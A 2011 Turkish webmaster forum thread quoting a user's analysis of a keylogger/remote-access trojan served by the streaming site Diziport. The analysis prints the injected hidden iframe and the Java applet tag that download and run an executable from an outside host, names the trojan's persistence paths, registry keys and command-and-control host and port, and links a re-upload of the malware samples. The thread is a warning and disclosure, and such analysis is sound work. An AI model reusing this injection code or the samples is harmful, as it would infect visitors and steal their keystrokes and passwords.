Diziport Virüs Yayınladı - Google Fan Webmaster Forum
Google Fan Webmaster Forum  
herşeyi sana yazdım

Geri git   Google Fan Webmaster Forum > Webmaster Genel > Webmaster Genel konular sorunlar
KEY
Kayıt ol Articles Sosyal Gruplar Forumları Okundu Kabul Et

Webmaster Genel konular sorunlar Webmaster genel konular sorular sorunlar

Like Tree2Beğeniler

Cevapla
 
LinkBack Seçenekler
  1  
Alt 08-11-2011, 02:14:05
 
Standart Diziport Virüs Yayınladı

Diziport biraz 1-2 saat önce sitesinden virüs yayınlamış. Bildiğimiz keylogger. Ekşisözlükte biriside incelemiş. İlginç.



Alıntı:
windows bilgisayarlarda cok yuksek ihtimalle (edit: dogrulandi!) bir virus calistiran bir sitedir. evet, kullanicilarin klavyelerinde bastiklari her tusu (sifreler, mesajlar vb, bir dosyaya kaydedip o dosyayi baskasina yolluyor) (bkz: keylogger)

(cok uzun *** bu okumam diyenlere ozet: diziport, java applet'ler araciligiyla baska bir siteden keylogger programi indirip onu calistiriyor)

nasil bir sey yaptiklarini birlikte gorelim.

sitenin kaynak kodunda,

--- kod 1---
<a href="http://twitter.com/diziport" title="" style="font-size:12px;"><iframe name="java" src="www.metinozdogan.com.tr/java/" width="1" height="1" scrolling="no" frameborder="0" marginwidth="0" marginheight="0"></iframe></a>
--- kod 1 ---

seklinde bir satir var. bunun yaptigi sey, siz sitenizi acinca tarayicida gorunmeyen bir pencerede metin ozdogan'in sitesinden (evet adini da yazalim da ne numaralar cevrildigi belli olsun) kodda gorulen sayfayi cagiriyor. (bkz: iframe)

peki bu sayfada ne var? "www.metinozdogan.com.tr/java/client.jar" seklinde bir java applet'i yukleyen bir kod.

--- kod 2 ---
<applet code='javaupdater.class' width='1' height='1' archive='www.metinozdogan.com.tr/java/client.jar'>
<param name="url" value="www.medyaturk24.com/java/java.exe" />
</applet>
--- kod 2 ---

peki bu client.jar'in icinde ne var diyorsaniz, indirip decompile edip gorelim. icinden javaupdater.class cikiyor. hatta bakin ne guzel, hazir yapilmisi var:

--- kod 3 ---
http://pastebin.com/bmfV8Xfp
--- kod 3 ---

peki bu java kodu ne yapiyor biraz aciklayacak olursak,

1) (windows bilgisayarlarda) c:\documents and settings\kullaniciadiniz\rundll32.exe seklinde, sistem dosyasi gibi gorunen ama aslinda sistem dosyasi olmayan bir dosya yaratiyor.

2) sonra kod 2'deki (bakin yukarda) url parametresinde yazan www.medyaturk24.com/java/java.exe (tiklamayin) dosyasini bilgisayariniza indiriyor ve bu dosyayi iste o rundll32.exe'nin icine yazip bilgisayara koyuyor.

3) sonra da bu internetten indirdigi dosyayi bilgisayarinizda calistiriyor. (kod 3, satir 50).

http://www.medyaturk24.com/java/ adresine gittiginizde muhtemelen daha once kullandiklari virusleri (ya da ne haltsa artik?) bulabiliyorsunuz. (82.exe 83.exe 84.exe 85.exe java.exe)

olur da silinir diye, butun bu dosyalari (exe'ler, .class, jar) zipleyip http://ge.tt/9dZsvf9 adresine koydum. link expire olursa isteyen yazarlar mesaj atabilirler tekrar koyarim.

java.exe adiyla gorunen dosyanin ne yaptigini benden daha tecrubeli reverse engineer'lara birakiyorum. sanirim emrah beyazkaya (https://www.facebook.com/unlemisareti) (diziport'un sahibi) simdi bize bir aciklama borclu, kim bu metin ozdogan, ne bu medyaturk'ten cekilen java.exe ve neden insanlarin bilgisayarlarinda calistiriliyor.

saygilar.

~~~~~~~~~~~~~~~~~~~~~~~

devami unpacked adli sozluk yazarindan geliyor, helal olsun adam ugrasmis.

--- spoiler ---

java.exe sunlari yapiyor:

enigma protector isimli bir yazılımla uygulamayı şifreleyerek antivirüslerden kaçmaya çalışmış ama pek başarılı olamamış sağlam antivirüsler tanıyor hatta 2 kere şifreleme yapılmış. önce aspack isimli uygulama ile (ki asıl dosya bu). sonra onu temp klasörüne çıkarıp çalıştıracak dosyayı da enigma ile şifrelemiş.

bilgisayara uzaktan erişmeyi sağlayan bir trojan bu. tipik trojan hareketi olarak kendini varsayılan tarayıcı gibi gösteriyor processlerde. ayrıca tarayıcı kapanırsa diye yedek olarak svchost.exe'nin de içine giriyor.

kendini c:\?windows\?system32\?installdir\?nod.exe olarak kopyalıyor ve bunu bilgisayar başlangıcında açılacak şekilde ayarlıyor. bu büyük ihtimal uac etkin olan sistemlerde c:\users\user\appdata\roaming\nod.exe olur.

yine klasik trojan hareketi olarak registry'de local machine ve current user/software/microsoft/currentversion/run ve local machine/software/microsoft/?active setup/?installed components yerlerine yazarak yapıyor başlangıçta açılma ayarını. installed components altındaki keyi ?{8b51u067-e68s-ar02-qep7-i1l0440op7h3}

yalnız bu başlangıç bilgilerini trojan çalışırken silmek işe yaramaz. yeniler sürekli. önce nod.exe kaldırılmalı.

trojan sahibine ulaşmak için stapler4445.no-ip.org adresinden ip bilgisini alıyor. o dns adresi trojanın sahibinin bağlantısını açıp kapadığında falan değişen ip adresini güncel olarak tutuyor. işte trojan da o ip adresine bağlanıp sahibinin listesinde bağlanılabilir olarak görülüyor. kullandığı port 3361.

keylog bilgilerini yani bastığın her tuşun kaydedildiği dosya c:\documents and settings\user\application data\microsoft\windows\uwcuemzbapecg.dat burada tutuluyor bu vista ve üzerinde değişir tabi. c:\users\user\appdata\ içinde bir yerlerde olur. şu uwcuemzbapecg kısmı da bilgisayara göre değişebilir bir ihtimal.

--- spoiler ---

onemli not: buyuk ihtimal bu siteye windows makinayla girdiyseniz virus kapmissiniz demektir. guncel bir anti-virus tarayici program isinizi gorecektir. (bkz: avira) bilgisayariniza full tarama yapin mumkunse.
http://www.eksisozluk.com/show.asp?id=26061448
YiMiTh and aystator like this.
Alıntı ile Cevapla
  2  
Alt 08-11-2011, 02:21:48
ad ad isimli üyemiz çevrimdışıdır. (Offline)
Üyeliği durduruldu
 
Standart

Ne olacak. Birazdan hacklendik diyerek işin içinden sıyrılırlar. Bu kadar basit ne yazıkki
Alıntı ile Cevapla
  3  
Alt 08-11-2011, 02:34:03
 
Standart

Klasik yalan Hacklendik
Alıntı ile Cevapla
  4  
Alt 08-11-2011, 02:37:32
 
Standart

Aslında bu olayların hukuki yaptırımı var sanıyorum.

Diziport dağıtıcı statüsünde olduğundan dava açılabilir.
Alıntı ile Cevapla
  5  
Alt 08-11-2011, 21:46:15
 
Standart

http://diziport.com/duyuru.txt
__________________
Yapı meselesi bu ; Öfke ile kalktım mı Zararsız Oturtmam !

Konu Safak_Sebastian tarafından (08-11-2011 Saat 22:16:22 ) değiştirilmiştir..
Alıntı ile Cevapla
  6  
Alt 08-11-2011, 22:22:45
 
Standart

metin özdoğan kimmiş açıklasalar ya hackleyecek kişide salak ya isimi ile link koyucak
__________________
vBulletin Türkiye - vBulletin Hosting
Alıntı ile Cevapla
  7  
Alt 09-11-2011, 14:26:53
 
Standart

Diziporttan bi daha dizi izlemem
Alıntı ile Cevapla
  8  
Alt 09-11-2011, 14:38:35
 
Standart

Alıntı:
Safak_Sebastian Nickli Üyeden Alıntı Mesajı göster
Yazmak kolay savcılık kağıdını koy desen koyamazlar . Bide karşılıksız yapıyorlarmış .
Alıntı ile Cevapla
  9  
Alt 09-11-2011, 14:51:58
 
Standart

dizihd forever
Alıntı ile Cevapla
  10  
Alt 09-11-2011, 14:55:21
 
Standart

Alıntı:
Aslanhost Nickli Üyeden Alıntı Mesajı göster
dizihd forever
aynen valla eskiden hep diziporttan izlerdim artık hep dizihd den izliyorum adamlar daha iyi hizmet veriyorlar ve daha hızlı
Alıntı ile Cevapla
Cevapla


Bookmarks

Seçenekler

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Açık



Tüm Zamanlar GMT +3 Olarak Ayarlanmış. Şuanki Zaman: 17:06:13.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.

“İnsanların en hayırlısı, insanlara faydalı olandır”. H.Ş

Hosting by Radore Hosting

İçerik sağlayacı paylaşım sitelerinden biri olan R10.net WebMaster Forum Adresimizde 5651 Sayılı Kanun’un 8. Maddesine ve T.C.K’nın 125. Maddesine göre TÜM ÜYELERİMİZ yaptıkları paylaşımlardan sorumludur. R10.net hakkında yapılacak tüm hukuksal Şikayetler adresi ile iletişime geçilmesi halinde ilgili kanunlar ve yönetmelikler çerçevesinde en geç 1 (Bir) Hafta içerisinde R10.net yönetimi olarak tarafımızdan gereken işlemler yapılacak ve Avukatlarımız size dönüş yapacaktır.
ARGUS_OK

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252